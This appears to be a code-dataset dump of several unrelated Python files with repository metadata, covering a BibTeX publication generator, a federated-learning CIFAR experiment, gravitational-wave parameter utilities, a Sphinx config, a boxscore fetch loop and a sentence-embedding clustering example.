bibdata = parser.parse_file(publist[pubsource]["file"])
#loop through the individual references in a given bibtex file
for bib_id in bibdata.entries:
#reset default date
pub_year = "1900"
pub_month = "01"
pub_day = "01"
b = bibdata.entries[bib_id].fields
try:
pub_year = f'{b["year"]}'
#todo: this hack for month and day needs some cleanup
if "month" in b.keys():
if(len(b["month"])<3):
pub_month = "0"+b["month"]
pub_month = pub_month[-2:]
elif(b["month"] not in range(12)):
tmnth = strptime(b["month"][:3],'%b').tm_mon
pub_month = "{:02d}".format(tmnth)
else:
pub_month = str(b["month"])
if "day" in b.keys():
pub_day = str(b["day"])
pub_date = pub_year+"-"+pub_month+"-"+pub_day
#strip out {} as needed (some bibtex entries that maintain formatting)
clean_title = b["title"].replace("{", "").replace("}","").replace("\\","").replace(" ","-")
url_slug = re.sub("\\[.*\\]|[^a-zA-Z0-9_-]", "", clean_title)
url_slug = url_slug.replace("--","-")
md_filename = (str(pub_date) + "-" + url_slug + ".md").replace("--","-")
html_filename = (str(pub_date) + "-" + url_slug).replace("--","-")
#Build Citation from text
citation = ""
#citation authors - todo - add highlighting for primary author?
for author in bibdata.entries[bib_id].persons["author"]:
citation = citation+" "+author.first_names[0]+" "+author.last_names[0]+", "
#citation title
citation = citation + "\"" + html_escape(b["title"].replace("{", "").replace("}","").replace("\\","")) + ".\""
#add venue logic depending on citation type
venue = publist[pubsource]["venue-pretext"]+b[publist[pubsource]["venuekey"]].replace("{", "").replace("}","").replace("\\","")
citation = citation + " " + '<i>' + html_escape(venue) + '</i>'
citation = citation + ", " + pub_year + "."
## YAML variables
md = "---\ntitle: \"" + html_escape(b["title"].replace("{", "").replace("}","").replace("\\","")) + '"\n'
md += """collection: """ + publist[pubsource]["collection"]["name"]
md += """\npermalink: """ + publist[pubsource]["collection"]["permalink"] + html_filename
md += """\ncategory: """ + pubsource
note = False
if "note" in b.keys():
if len(str(b["note"])) > 5:
md += "\nexcerpt: '" + html_escape(b["note"]) + "'"
note = True
md += "\ndate: " + str(pub_date)
md += "\nvenue: '" + html_escape(venue) + "'"
url = False
if "url" in b.keys():
if len(str(b["url"])) > 5:
md += "\npaperurl: '" + b["url"] + "'"
url = True
md += "\ncitation: '" + html_escape(citation) + "'"
md += "\n---"
## Markdown description for individual page
if note:
md += "\n" + html_escape(b["note"]) + "\n"
if url:
md += "\n[Access paper here](" + b["url"] + "){:target=\"_blank\"}\n"
else:
md += "\nUse [Google Scholar](https://scholar.google.com/scholar?q="+html.escape(clean_title.replace("-","+"))+"){:target=\"_blank\"} for full citation"
md_filename = os.path.basename(md_filename)
with open("../_publications/" + md_filename, 'w') as f:
f.write(md)
print(f'SUCESSFULLY PARSED {bib_id}: \"', b["title"][:60],"..."*(len(b['title'])>60),"\"")
# field may not exist for a reference
except KeyError as e:
print(f'WARNING Missing Expected Field {e} from entry {bib_id}: \"', b["title"][:30],"..."*(len(b['title'])>30),"\"")
continue
| 36.645714 | 273 | 0.51801 |
4a1f4bb0226765188e68e6fb59309d63a0e26ff2 | 5,969 | py | Python | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | 5 | 2019-07-23T14:49:46.000Z | 2022-03-30T13:54:22.000Z | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | null | null | null | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
import collections
import numpy as np
from six.moves import range
import tensorflow as tf
import datetime
from tensorflow_federated import python as tff
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.keras import layers
tf.compat.v1.enable_v2_behavior()
EXP_CODE = 'E12C4'
NUM_EXAMPLES_PER_USER = 2000
BATCH_SIZE = 32
USERS = 5
NUM_EPOCHS = 12
CLASSES = 10
WIDTH = 32
HEIGHT = 32
CHANNELS = 3
def mane():
""" Run program """
cifar_train, cifar_test = tf.keras.datasets.cifar10.load_data()
federated_train_data = [get_distributed(cifar_train, u, 'i') for u in range(USERS)]
(X_test, y_test) = get_non_distributed(cifar_test)
sample_batch = federated_train_data[1][-2]
non_federated_model = create_compiled_keras_model()
def model_fn():
keras_model = create_compiled_keras_model()
return tff.learning.from_compiled_keras_model(keras_model, sample_batch)
iterative_process = tff.learning.build_federated_averaging_process(model_fn)
evaluation = tff.learning.build_federated_evaluation(model_fn)
state = iterative_process.initialize()
fd_test_accuracy = []
fd_test_loss = []
fd_train_loss = []
for round_num in range(12):
selected = np.random.choice(5, 4, replace=False)
state, metrics = iterative_process.next(state, list(np.array(federated_train_data)[selected]))
non_federated_model.set_weights(state.model.trainable)
(loss, accuracy) = non_federated_model.evaluate(X_test, y_test)
fd_train_loss.append(metrics[1])
fd_test_accuracy.append(accuracy)
fd_test_loss.append(loss)
try:
with open('Log/Exp12/'+ EXP_CODE + '.txt', 'w') as log:
print(state.model.trainable, file=log)
except IOError:
print('File Error')
def get_indices_realistic(y, u):
# split dataset into arrays of each class label
all_indices = [i for i, d in enumerate(y)]
shares_arr = [4000, 2000, 2000, 1000, 1000]
user_indices = []
for u in range(USERS):
user_indices.append([all_indices.pop(0) for i in range(shares_arr[u])])
return user_indices
def get_indices_unbalanced(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
# each user will have 2 classes excluded from their data sets, thus 250 examples * remaining 8 classes
class_shares = 250
# store indices for future use
user_indices = []
# auxilary index array to pop out pairs of classes missing at each user
class_index = list(range(CLASSES))
for u in range(USERS):
columns_out = [class_index.pop(0) for i in range(2)]
selected_columns = set(range(CLASSES)) - set(columns_out)
starting_index = u*class_shares
user_indices.append(
np.array(indices_array)[list(selected_columns)].T[starting_index:starting_index + class_shares]
.flatten())
return user_indices
def get_indices_unbalanced_completely(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
class_shares = CLASSES // min(CLASSES, USERS)
user_indices = []
for u in range(USERS):
user_indices.append(
np.array(
[indices_array.pop(0)[:NUM_EXAMPLES_PER_USER//class_shares] for j in range(class_shares)])
.flatten())
return user_indices
def get_indices_even(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
user_indices = []
class_shares = NUM_EXAMPLES_PER_USER // CLASSES
# take even shares of each class for every user
for u in range(USERS):
starting_index = u*class_shares
user_indices.append(np.array(indices_array).T[starting_index:starting_index + class_shares].flatten())
return user_indices
def get_distributed(source, u, distribution):
if distribution == 'i':
indices = get_indices_even(source[1])[u]
elif distribution == 'n':
indices = get_indices_unbalanced(source[1])[u]
elif distribution == 'r':
indices = get_indices_realistic(source[1][:10000], u)[u]
else:
indices = get_indices_unbalanced_completely(source[1])[u]
output_sequence = []
for repeat in range(NUM_EPOCHS):
for i in range(0, len(indices), BATCH_SIZE):
batch_samples = indices[i:i + BATCH_SIZE]
output_sequence.append({
'x': np.array([source[0][b] / 255.0 for b in batch_samples], dtype=np.float32),
'y': np.array([source[1][b] for b in batch_samples], dtype=np.int32)})
return output_sequence
def get_non_distributed(source):
y = np.array(source[1][:10000], dtype=np.int32)
X = np.array(source[0][:10000], dtype=np.float32) / 255.0
return X, y
def create_compiled_keras_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(32,(3, 3),
activation="tanh",
padding="same",
input_shape=(WIDTH, HEIGHT, CHANNELS)),
tf.keras.layers.MaxPooling2D(pool_size=(2,2)),
tf.keras.layers.Conv2D(64, (3, 3), activation="tanh", padding="same"),
tf.keras.layers.MaxPooling2D(pool_size=(2,2)),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation="tanh"),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)])
def loss_fn(y_true, y_pred):
return tf.reduce_mean(tf.keras.losses.sparse_categorical_crossentropy(y_true, y_pred))
model.compile(loss=loss_fn, optimizer="adam", metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
return model
if __name__ == "__main__":
mane()
| 34.906433 | 113 | 0.681354 |
4a1f4bdffa14661370e4815c5eefb7172de1c50c | 5,996 | py | Python | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | null | null | null | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | null | null | null | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | 1 | 2021-08-22T07:05:15.000Z | 2021-08-22T07:05:15.000Z | """
Module to help convert parameters to our AGN formalism
"""
import bilby
import lalsimulation
import numpy as np
from bilby.gw.conversion import (
component_masses_to_chirp_mass, total_mass_and_mass_ratio_to_component_masses,
chirp_mass_and_mass_ratio_to_total_mass, generate_all_bbh_parameters, generate_spin_parameters, generate_mass_parameters,
convert_to_lal_binary_black_hole_parameters, generate_mass_parameters, generate_component_spins
)
from bilby_pipe.gracedb import (
determine_duration_and_scale_factor_from_parameters,
)
from .spin_conversions import calculate_relative_spins_from_component_spins
from numpy import cos, sin
REFERENCE_FREQ = 20
def add_kick(df):
from bbh_simulator.calculate_kick_vel_from_samples import Samples
samples = Samples(posterior=df)
samples.calculate_remnant_kick_velocity()
return samples.posterior
def add_signal_duration(df):
df["chirp_mass"] = component_masses_to_chirp_mass(df['mass_1'], df['mass_2'])
duration, roq_scale_factor = np.vectorize(
determine_duration_and_scale_factor_from_parameters
)(chirp_mass=df["chirp_mass"])
df["duration"] = duration
long_signals = [
f"data{i}" for i in range(len(duration)) if duration[i] > 4
]
# print(f"long_signals= " + str(long_signals).replace("'", ""))
return df
def add_snr(df):
required_params = [
"dec",
"ra",
"theta_jn",
"geocent_time",
"luminosity_distance",
"psi",
"phase",
"mass_1",
"mass_2",
"a_1",
"a_2",
"tilt_1",
"tilt_2",
"phi_12",
"phi_jl",
]
df_cols = list(df.keys())
missing_params = set(required_params) - set(df_cols)
if len(missing_params) != 0:
raise ValueError(f"Params missing for SNR calculation: {missing_params}")
h1_snr, l1_snr, network_snr = _get_injection_snr(**df)
df["h1_snr"] = h1_snr
df["l1_snr"] = l1_snr
df["network_snr"] = network_snr
return df
@np.vectorize
def _get_injection_snr(
a_1,
a_2,
dec,
ra,
psi,
phi_12,
phase,
geocent_time,
mass_1,
mass_2,
luminosity_distance,
tilt_1,
tilt_2,
theta_jn,
phi_jl,
**kwargs,
):
"""
:returns H1 snr, L1 snr, network SNR
"""
injection_parameters = dict(
# location params
dec=dec,
ra=ra,
theta_jn=theta_jn,
luminosity_distance=luminosity_distance,
geocent_time=geocent_time,
# phase params
psi=psi,
phase=phase,
# mass params
mass_1=mass_1,
mass_2=mass_2,
# spin params
a_1=a_1,
a_2=a_2,
phi_12=phi_12,
tilt_1=tilt_1,
tilt_2=tilt_2,
phi_jl=phi_jl,
)
chirp_mass = bilby.gw.conversion.component_masses_to_chirp_mass(
mass_1, mass_2
)
duration, _ = determine_duration_and_scale_factor_from_parameters(
chirp_mass
)
sampling_frequency = 2048.0
waveform_generator = bilby.gw.WaveformGenerator(
duration=duration,
sampling_frequency=sampling_frequency,
frequency_domain_source_model=bilby.gw.source.lal_binary_black_hole,
parameter_conversion=bilby.gw.conversion.convert_to_lal_binary_black_hole_parameters,
waveform_arguments=dict(
waveform_approximant="IMRPhenomPv2",
reference_frequency=REFERENCE_FREQ,
minimum_frequency=20.0,
),
)
# Set up interferometers.
ifos = bilby.gw.detector.InterferometerList(["H1", "L1"])
ifos.set_strain_data_from_power_spectral_densities(
sampling_frequency=sampling_frequency,
duration=duration,
start_time=injection_parameters["geocent_time"] - 2,
)
ifos.inject_signal(
waveform_generator=waveform_generator, parameters=injection_parameters
)
snrs = [ifo.meta_data["optimal_SNR"] for ifo in ifos]
network_snr = np.sqrt(np.sum([i ** 2 for i in snrs]))
return snrs[0], snrs[1], network_snr
@np.vectorize
def get_chi_eff(s1z, s2z, q):
return (s1z + s2z * q) / (1 + q)
@np.vectorize
def get_chi_p(s1x, s1y, s2x, s2y, q):
chi1p = np.sqrt(s1x ** 2 + s1y ** 2)
chi2p = np.sqrt(s2x ** 2 + s2y ** 2)
qfactor = q * ((4 * q) + 3) / (4 + (3 * q))
return np.maximum(chi1p, chi2p * qfactor)
def get_component_mass_from_source_mass_and_z(m1_source, q, z):
m1 = m1_source * (1 + np.array(z))
m2 = m1 * q
return m1, m2
def get_component_mass_from_mchirp_q(mchirp, q):
mtot = chirp_mass_and_mass_ratio_to_total_mass(chirp_mass=mchirp, mass_ratio=q)
m1, m2 = total_mass_and_mass_ratio_to_component_masses(mass_ratio=q, total_mass=mtot)
return m1, m2
def scale_vector(scale, vector):
if len(scale.shape) > 0:
if scale.shape[0] == vector.shape[0]:
return np.array([m * v for m, v in zip(scale, vector)])
else:
v = scale * vector
v.shape = (3,1)
return v.T
def add_cos_theta_12_from_component_spins(s):
_, _, _, _, _, _, _, theta_12, _ = calculate_relative_spins_from_component_spins(s["spin_1x"], s["spin_1y"], s["spin_1z"], s["spin_2x"], s["spin_2y"], s["spin_2z"])
s['cos_theta_12'] = np.cos(theta_12)
return s
def process_samples(s, rf):
s['reference_frequency'] = rf
s, _ = convert_to_lal_binary_black_hole_parameters(s)
s = generate_mass_parameters(s)
s = generate_spin_parameters(s)
s = add_cos_theta_12_from_component_spins(s)
try:
s = add_snr(s)
s['snr'] = s['network_snr']
except Exception as e:
pass
return s
def result_post_processing(r:bilby.gw.result.CBCResult):
r.posterior = add_cos_theta_12_from_component_spins(r.posterior)
r.injection_parameters = process_samples(r.injection_parameters, r.reference_frequency)
return r
| 27.888372 | 168 | 0.653936 |
4a1f4c6be3b9c1f74fc1037c8b22db49e482779f | 1,984 | py | Python | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2020-12-22T11:12:35.000Z | 2021-12-15T13:30:02.000Z | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2021-01-16T07:34:22.000Z | 2021-08-14T06:56:07.000Z | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'Bunruija'
copyright = '2021, Takuya Makino'
author = 'Takuya Makino'
# The full version, including alpha/beta/rc tags
release = '0.0.0'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 34.206897 | 79 | 0.664315 |
4a1f4e883ee98be13f0c2970723e5a35ca16742a | 377 | py | Python | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | null | null | null | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | 17 | 2020-02-10T11:27:00.000Z | 2022-02-26T11:52:12.000Z | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | null | null | null | import os
import datetime
# move to correct path
FILE_PATH = os.path.join(os.path.dirname(
os.path.realpath(__file__)), "backend")
os.chdir(FILE_PATH)
# day before first fetch date
date = datetime.datetime(2019, 3, 10)
for i in range(0, 20):
date += datetime.timedelta(days=1)
dateStr = date.strftime('%Y-%m-%d')
os.system(f'npm run fetch_boxscores {date}')
| 23.5625 | 48 | 0.69496 |
4a1f4e9f6e8adbb2ec3ca57f186e3f78893d0b11 | 966 | py | Python | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | import json
import os
from colorama import init, Style, Fore
from project_manager_pro._meta import cache_commands, cache_projects
init(autoreset=True)
def _exec(alias, name):
# loading command
file = open(cache_commands, 'r', encoding='utf-8')
commands = json.load(file)
if alias in commands:
command = commands[alias]
else:
print(Fore.RED + 'Command with alias \'' + alias + '\' not found')
return
# loading project
file = open(cache_projects, 'r', encoding='utf-8')
data = json.load(file)
for type in data:
for project in data[type]:
if project['name'] == str(name) or str(project['hash']) == str(name):
command = command.replace('$', project['path'])
print(Fore.GREEN + 'run ' + Fore.CYAN + command)
os.system(command)
return
print(Fore.RED + 'Project with name (hash) \'' + str(name) + '\' not found')
| 25.421053 | 81 | 0.594203 |
4a1f4f0832cac8cf9964fff3f967b7d2b3ca3c02 | 9,629 | py | Python | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 11 | 2019-06-27T09:53:29.000Z | 2021-03-02T04:40:30.000Z | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 12 | 2018-09-21T12:02:18.000Z | 2018-09-25T09:14:59.000Z | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 4 | 2019-08-05T15:35:33.000Z | 2020-09-18T18:55:02.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" OperatorStateFn Class """
from typing import Union, Set, List
import numpy as np
from qiskit.circuit import ParameterExpression
from ..operator_base import OperatorBase
from .state_fn import StateFn
from .vector_state_fn import VectorStateFn
from ..list_ops.list_op import ListOp
from ..list_ops.summed_op import SummedOp
# pylint: disable=invalid-name
class OperatorStateFn(StateFn):
r"""
A class for state functions and measurements which are defined by a density Operator,
stored using an ``OperatorBase``.
"""
# TODO allow normalization somehow?
def __init__(self,
primitive: OperatorBase = None,
coeff: Union[int, float, complex, ParameterExpression] = 1.0,
is_measurement: bool = False) -> None:
"""
Args:
primitive: The ``OperatorBase`` which defines the behavior of the underlying State
function.
coeff: A coefficient by which to multiply the state function
is_measurement: Whether the StateFn is a measurement operator
"""
super().__init__(primitive, coeff=coeff, is_measurement=is_measurement)
def primitive_strings(self) -> Set[str]:
return self.primitive.primitive_strings()
@property
def num_qubits(self) -> int:
return self.primitive.num_qubits
def add(self, other: OperatorBase) -> OperatorBase:
if not self.num_qubits == other.num_qubits:
raise ValueError(
'Sum over statefns with different numbers of qubits, {} and {}, is not well '
'defined'.format(self.num_qubits, other.num_qubits))
# Right now doesn't make sense to add a StateFn to a Measurement
if isinstance(other, OperatorStateFn) and self.is_measurement == other.is_measurement:
if isinstance(self.primitive.primitive, type(other.primitive.primitive)) and \
self.primitive == other.primitive:
return StateFn(self.primitive,
coeff=self.coeff + other.coeff,
is_measurement=self.is_measurement)
# Covers Statevector and custom.
elif isinstance(other, OperatorStateFn):
# Also assumes scalar multiplication is available
return OperatorStateFn(
(self.coeff * self.primitive).add(other.primitive * other.coeff),
is_measurement=self._is_measurement)
return SummedOp([self, other])
def adjoint(self) -> OperatorBase:
return OperatorStateFn(self.primitive.adjoint(),
coeff=self.coeff.conjugate(),
is_measurement=(not self.is_measurement))
def _expand_dim(self, num_qubits: int) -> 'OperatorStateFn':
return OperatorStateFn(self.primitive._expand_dim(num_qubits),
coeff=self.coeff,
is_measurement=self.is_measurement)
def permute(self, permutation: List[int]) -> 'OperatorStateFn':
return OperatorStateFn(self.primitive.permute(permutation),
coeff=self.coeff,
is_measurement=self.is_measurement)
def tensor(self, other: OperatorBase) -> OperatorBase:
if isinstance(other, OperatorStateFn):
return StateFn(self.primitive.tensor(other.primitive),
coeff=self.coeff * other.coeff,
is_measurement=self.is_measurement)
# pylint: disable=cyclic-import,import-outside-toplevel
from .. import TensoredOp
return TensoredOp([self, other])
def to_density_matrix(self, massive: bool = False) -> np.ndarray:
""" Return numpy matrix of density operator, warn if more than 16 qubits
to force the user to set
massive=True if they want such a large matrix. Generally big methods like
this should require the use of a
converter, but in this case a convenience method for quick hacking and
access to classical tools is
appropriate. """
OperatorBase._check_massive('to_density_matrix', True, self.num_qubits, massive)
return self.primitive.to_matrix() * self.coeff
def to_matrix_op(self, massive: bool = False) -> OperatorBase:
""" Return a MatrixOp for this operator. """
return OperatorStateFn(self.primitive.to_matrix_op(massive=massive) * self.coeff,
is_measurement=self.is_measurement)
def to_matrix(self, massive: bool = False) -> np.ndarray:
r"""
Note: this does not return a density matrix, it returns a classical matrix
containing the quantum or classical vector representing the evaluation of the state
function on each binary basis state. Do not assume this is is a normalized quantum or
classical probability vector. If we allowed this to return a density matrix,
then we would need to change the definition of composition to be ~Op @ StateFn @ Op for
those cases, whereas by this methodology we can ensure that composition always means Op
@ StateFn.
Return numpy vector of state vector, warn if more than 16 qubits to force the user to set
massive=True if they want such a large vector.
Args:
massive: Whether to allow large conversions, e.g. creating a matrix representing
over 16 qubits.
Returns:
np.ndarray: Vector of state vector
Raises:
ValueError: Invalid parameters.
"""
OperatorBase._check_massive('to_matrix', False, self.num_qubits, massive)
# Operator - return diagonal (real values, not complex),
# not rank 1 decomposition (statevector)!
mat = self.primitive.to_matrix(massive=massive)
# TODO change to weighted sum of eigenvectors' StateFns?
# ListOp primitives can return lists of matrices (or trees for nested ListOps),
# so we need to recurse over the
# possible tree.
def diag_over_tree(t):
if isinstance(t, list):
return [diag_over_tree(o) for o in t]
else:
vec = np.diag(t) * self.coeff
# Reshape for measurements so np.dot still works for composition.
return vec if not self.is_measurement else vec.reshape(1, -1)
return diag_over_tree(mat)
def to_circuit_op(self) -> OperatorBase:
r""" Return ``StateFnCircuit`` corresponding to this StateFn. Ignore for now because this is
undefined. TODO maybe call to_pauli_op and diagonalize here, but that could be very
inefficient, e.g. splitting one Stabilizer measurement into hundreds of 1 qubit Paulis."""
raise NotImplementedError
def __str__(self) -> str:
prim_str = str(self.primitive)
if self.coeff == 1.0:
return "{}({})".format('OperatorStateFn' if not self.is_measurement
else 'OperatorMeasurement', prim_str)
else:
return "{}({}) * {}".format(
'OperatorStateFn' if not self.is_measurement else 'OperatorMeasurement',
prim_str,
self.coeff)
# pylint: disable=too-many-return-statements
def eval(self,
front: Union[str, dict, np.ndarray,
OperatorBase] = None) -> Union[OperatorBase, float, complex]:
if front is None:
matrix = self.primitive.to_matrix_op().primitive.data
return VectorStateFn(matrix[0, :])
if not self.is_measurement and isinstance(front, OperatorBase):
raise ValueError(
'Cannot compute overlap with StateFn or Operator if not Measurement. Try taking '
'sf.adjoint() first to convert to measurement.')
if not isinstance(front, OperatorBase):
front = StateFn(front)
if isinstance(self.primitive, ListOp) and self.primitive.distributive:
coeff = self.coeff * self.primitive.coeff
evals = [OperatorStateFn(op, coeff=coeff, is_measurement=self.is_measurement).eval(
front) for op in self.primitive.oplist]
return self.primitive.combo_fn(evals)
# Need an ListOp-specific carve-out here to make sure measurement over a ListOp doesn't
# produce two-dimensional ListOp from composing from both sides of primitive.
# Can't use isinstance because this would include subclasses.
# pylint: disable=unidiomatic-typecheck
if type(front) == ListOp:
return front.combo_fn([self.eval(front.coeff * front_elem) # type: ignore
for front_elem in front.oplist]) # type: ignore
return front.adjoint().eval(self.primitive.eval(front)) * self.coeff # type: ignore
def sample(self,
shots: int = 1024,
massive: bool = False,
reverse_endianness: bool = False) -> dict:
raise NotImplementedError
| 44.786047 | 100 | 0.636515 |
4a1f4f2367cd8ef1e8f90d7e2d48211cc5da3fa8 | 5,711 | py | Python | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | """
This is a more complex example on performing clustering on large scale dataset.
This examples find in a large set of sentences local communities, i.e., groups of sentences that are highly
similar. You can freely configure the threshold what is considered as similar. A high threshold will
only find extremely similar sentences, a lower threshold will find more sentence that are less similar.
A second parameter is 'min_community_size': Only communities with at least a certain number of sentences will be returned.
The method for finding the communities is extremely fast, for clustering 50k sentences it requires only 5 seconds (plus embedding comuptation).
In this example, we download a large set of questions from Quora and then find
similar questions in this set.
"""
from sentence_transformers import SentenceTransformer, util
import numpy as np
import os
import csv
import pickle
import time
def community_detection(embeddings, threshold=0.75, min_community_size=10, init_max_size=1000):
"""
Function for Fast Community Detection
Finds in the embeddings all communities, i.e. embeddings that are close (closer than threshold).
Returns only communities that are larger than min_community_size. The communities are returned
in decreasing order. The first element in each list is the central point in the community.
"""
# Compute cosine similarity scores
cos_scores = util.pytorch_cos_sim(embeddings, embeddings)
# Minimum size for a community
top_k_values, _ = cos_scores.topk(k=min_community_size, largest=True)
# Filter for rows >= min_threshold
extracted_communities = []
for i in range(len(top_k_values)):
if top_k_values[i][-1] >= threshold:
new_cluster = []
# Only check top k most similar entries
top_val_large, top_idx_large = cos_scores[i].topk(k=init_max_size, largest=True)
top_idx_large = top_idx_large.tolist()
top_val_large = top_val_large.tolist()
if top_val_large[-1] < threshold:
for idx, val in zip(top_idx_large, top_val_large):
if val < threshold:
break
new_cluster.append(idx)
else:
# Iterate over all entries (slow)
for idx, val in enumerate(cos_scores[i].tolist()):
if val >= threshold:
new_cluster.append(idx)
extracted_communities.append(new_cluster)
# Largest cluster first
extracted_communities = sorted(extracted_communities, key=lambda x: len(x), reverse=True)
# Step 2) Remove overlapping communities
unique_communities = []
extracted_ids = set()
for community in extracted_communities:
add_cluster = all(idx not in extracted_ids for idx in community)
if add_cluster:
unique_communities.append(community)
for idx in community:
extracted_ids.add(idx)
return unique_communities
# Model for computing sentence embeddings. We use one trained for similar questions detection
model = SentenceTransformer('distilbert-base-nli-stsb-quora-ranking')
# We donwload the Quora Duplicate Questions Dataset (https://www.quora.com/q/quoradata/First-Quora-Dataset-Release-Question-Pairs)
# and find similar question in it
url = "http://qim.fs.quoracdn.net/quora_duplicate_questions.tsv"
dataset_path = "quora_duplicate_questions.tsv"
max_corpus_size = 50000 # We limit our corpus to only the first 50k questions
embedding_cache_path = 'quora-embeddings-size-{}.pkl'.format(max_corpus_size)
#Check if embedding cache path exists
if not os.path.exists(embedding_cache_path):
# Check if the dataset exists. If not, download and extract
# Download dataset if needed
if not os.path.exists(dataset_path):
print("Download dataset")
util.http_get(url, dataset_path)
# Get all unique sentences from the file
corpus_sentences = set()
with open(dataset_path, encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
for row in reader:
corpus_sentences.add(row['question1'])
if len(corpus_sentences) >= max_corpus_size:
break
corpus_sentences.add(row['question2'])
if len(corpus_sentences) >= max_corpus_size:
break
corpus_sentences = list(corpus_sentences)
print("Encode the corpus. This might take a while")
corpus_embeddings = model.encode(corpus_sentences, show_progress_bar=True, convert_to_numpy=True)
print("Store file on disc")
with open(embedding_cache_path, "wb") as fOut:
pickle.dump({'sentences': corpus_sentences, 'embeddings': corpus_embeddings}, fOut)
else:
print("Load pre-computed embeddings from disc")
with open(embedding_cache_path, "rb") as fIn:
cache_data = pickle.load(fIn)
corpus_sentences = cache_data['sentences']
corpus_embeddings = cache_data['embeddings']
print("Start clustering")
start_time = time.time()
#Two parameter to tune:
#min_cluster_size: Only consider cluster that have at least 25 elements (30 similar sentences)
#threshold: Consider sentence pairs with a cosine-similarity larger than threshold as similar
clusters = community_detection(corpus_embeddings, min_community_size=25, threshold=0.95)
#Print all cluster / communities
for i, cluster in enumerate(clusters):
print("\nCluster {}, #{} Elements ".format(i+1, len(cluster)))
for sentence_id in cluster:
print("\t", corpus_sentences[sentence_id])
